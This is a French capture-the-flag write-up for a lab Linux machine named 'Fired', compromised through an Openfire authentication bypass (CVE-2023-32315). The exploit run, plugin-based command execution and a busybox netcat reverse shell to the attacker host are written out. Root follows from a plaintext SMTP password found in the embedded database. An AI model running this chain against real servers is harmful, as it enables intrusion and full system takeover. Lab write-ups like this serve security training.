# Fired

`openfire`

* Nom machine : Fired
* Difficulté : Intermédiaire
* OS : Linux

## Enumération

### NMAP

```
Nmap scan report for 192.168.205.96
Host is up (0.037s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
9090/tcp open  zeus-admin
9091/tcp open  xmltec-xmlmail
```

### HTTP (9090)

OpenFire

{% embed url="<https://github.com/miko550/CVE-2023-32315>" %}

```
┌──(kali㉿kali)-[~/htb]
└─$ git clone https://github.com/miko550/CVE-2023-32315.git
Cloning into 'CVE-2023-32315'...
remote: Enumerating objects: 31, done.
remote: Counting objects: 100% (31/31), done.
remote: Compressing objects: 100% (29/29), done.
remote: Total 31 (delta 15), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (31/31), 38.13 KiB | 1.59 MiB/s, done.
Resolving deltas: 100% (15/15), done.
┌──(kali㉿kali)-[~/htb]
└─$ cd CVE-2023-32315
┌──(kali㉿kali)-[~/htb/CVE-2023-32315]
└─$ pip3 install -r requirements.txt
Defaulting to user installation because normal site-packages is not writeable
DEPRECATION: Loading egg at /usr/local/lib/python3.11/dist-packages/pywhisker-0.1.0-py3.11.egg is deprecated. pip 25.1 will enforce this behaviour change. A possible replacement is to use pip for package installation. Discussion can be found at https://github.com/pypa/pip/issues/12330
Collecting HackRequests (from -r requirements.txt (line 1))
  Downloading HackRequests-1.2-py3-none-any.whl.metadata (677 bytes)
Downloading HackRequests-1.2-py3-none-any.whl (7.3 kB)
Installing collected packages: HackRequests
Successfully installed HackRequests-1.2
┌──(kali㉿kali)-[~/htb/CVE-2023-32315]
└─$ python3 CVE-2023-32315.py -t http://192.168.205.96:9090 


 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗      ██████╗ ██████╗ ██████╗  ██╗███████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗     ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚═══██╗██╔═══╝  ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝     ██████╔╝███████╗██████╔╝ ██║███████║
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝      ╚═════╝ ╚══════╝╚═════╝  ╚═╝╚══════╝
                                                                                                       
Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!

[..] Checking target: http://192.168.205.96:9090
Successfully retrieved JSESSIONID: node0jp50013d8iug1i67k8j0d0npu4.node0 + csrf: AxHdf1soa4KErbH
User added successfully: url: http://192.168.205.96:9090 username: 9ah9rw password: ky2k1r
```

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FRSvv4RRucAdCyNWudDz6%2Fcaa8ca33fab8259326963715b7ffdd05.png?alt=media&#x26;token=7224c6d9-efe9-4530-a576-815e845f2368" alt=""><figcaption></figcaption></figure>

Nous sommes bien administrator. Nous allons tenter d'obtenir un reverse shell.

## Accès initial

Nous allons nous connecter puis aller dans Plugin pour upload le fichier .jar que nous avons téléchargé précédemment sur git. On suit encore les mêmes indicatons, nous allons dans les settings puis Management Tool, et nous rentrons le mot de passe 123. On peut exécuter des commandes dans "system command".

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FK23B1ernZQVazzKrGTxw%2F3f034f20ffebdfd77a6a1a3655383fdb.png?alt=media&#x26;token=d57fe97a-0e9e-48f4-8aff-6f6bb1793fd5" alt=""><figcaption></figcaption></figure>

Buzybox fonctionne

```
busybox nc 192.168.45.189 9091 -e /bin/bash
```

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 9091
listening on [any] 9091 ...
connect to [192.168.45.189] from (UNKNOWN) [192.168.205.96] 35294
```

Nous sommes openfire

## Elévation des privilèges

En lancant Linpeas rien ne nous saute aux yeux. Nous allons chercher à énumérer les fichiers de configurations afin de trouver un mot de passe en clair.

```
openfire@openfire:/usr/share/openfire$ cd embedded-db
openfire@openfire:/usr/share/openfire/embedded-db$ cat openfire.script
{...}
INSERT INTO OFPROPERTY VALUES('mail.configured','true',0,NULL)
INSERT INTO OFPROPERTY VALUES('mail.debug','false',0,NULL)
INSERT INTO OFPROPERTY VALUES('mail.smtp.host','localhost',0,NULL)
INSERT INTO OFPROPERTY VALUES('mail.smtp.password','OpenFireAtEveryone',0,NULL)
INSERT INTO OFPROPERTY VALUES('mail.smtp.port','25',0,NULL)
INSERT INTO OFPROPERTY VALUES('mail.smtp.ssl','false',0,NULL)
INSERT INTO OFPROPERTY VALUES('mail.smtp.username','root',0,NULL)
INSERT INTO OFPROPERTY VALUES('passwordKey','EOAJUe2Sqdlfqjk',0,NULL)

openfire@openfire:/usr/share/openfire/embedded-db$ su root
su root
Password: OpenFireAtEveryone

root@openfire:/usr/share/openfire/embedded-db# whoami
whoami
root
```